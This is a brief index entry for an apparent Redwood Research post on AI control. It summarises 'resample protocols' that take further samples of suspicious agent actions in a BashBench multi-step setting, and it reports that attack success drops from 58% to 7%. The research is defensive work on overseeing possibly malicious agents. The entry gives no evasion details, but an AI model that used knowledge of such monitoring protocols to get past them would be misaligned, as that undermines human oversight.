Ctrl-Z: Controlling AI Agents via Resampling

Aryan Bhatt, Buck Shlegeris, Adam Kaufman, Cody Rushing, Tyler Tracy, Vasil Georgiev, … (+2 more) — 2025-04-16 — Redwood Research — AI Alignment Forum

Summary

Introduces resample protocols for AI control that dynamically take additional samples of suspicious actions, demonstrating improved safety over existing control techniques in a multi-step agent setting with the new BashBench dataset.

Key Result

Best resample protocol combining resampling with analysis of previous steps reduces attack success rate from 58% to 7% at only 5% cost to non-malicious agent performance.

Source